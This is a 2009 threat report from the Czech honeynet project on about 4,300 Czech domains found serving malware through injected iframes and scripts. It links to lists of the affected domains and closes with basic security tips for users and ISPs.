logo-honeynet.cz

Thousands of czech domains distributing malware.

2009-06-15 15:31:36

In our database is currently conducted just over 4,300 infected Czech domain, which currently (+ / - 14 days) distribute malware. Pages contain malicious code, in a iframe, script, or a combination thereof using JS functions or as document.write unescape. Interpreted code is often another script or follow-up scripts that call an external URL. Tests were conducted on sites stored in our databases via defined signatures. Infected sites also visits native sensors in the virtual environment.

 

The infection itself:

In my opinion, a substantial part of the site is infected with the theft of passwords, but it is not excluded that certain sites will be affected directly through any of the weaknesses of the server or running applications. Eg. to www.mp3kestazenizdarma.cz (also www.mp3-free-stazeni.cz) are infected with all the domain of the third and higher level.

Warning: Open the following links is completely safe, but can be dangerous viewed embedded URL!

List of Czech domains:

http://www.honeynet.cz/domains/cz.txt

List of harmful URL:

http://www.honeynet.cz/domains/malicious.txt

How about they will, the list includes a variety of Web sites with a wide scope. In a global perspective, the ideal sample. Imagine, for which various groups are currently attackers access. This is how it can use, you just let your imagination.

 

How to anticipate infection your website or compromite your password? We are try to describe few hints, witch can minimalize intrusion to your server or desktop

For users:

  1. Up-to-date your operationg system, applications, antivirus (without antivirus, it's not gut idea to start your PC. Up-to-date your up-to-dates ;]
  2. Don't visit unknown or dicky webpages. If it's nesesery, use some firefox extension as a NoScript or tools as a Sanboxie
  3. Don't install each application, witch you get from your friend or from some dicky website. For this situation, you can use some virtualization software like VirtualBox or Vmware. Common user practice is click to all 'install/yes' button.
  4. Don't use FTP servers. If you have no choice, don't save passwords to your ftp client, if you don't know, if or how strong is password crypt. you can use some keychains as KeePass. But be careful and learn, how your keychain work.
  5. It's gut idea to use some cypt protocols like SSH, HTTPS, SFTP, FTP-SSL or VPN. there is no way to listen password with sniffers.

For ISP:

  1. Server anothers file transfer than a FPT
  2. Better checking of files like a filetype or content of files.
  3. Better customer education

Back

©2005-2010  Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Czech Republic License. info_at_honeynet_dot_cz, irc.honeynet.cz #honeynet.cz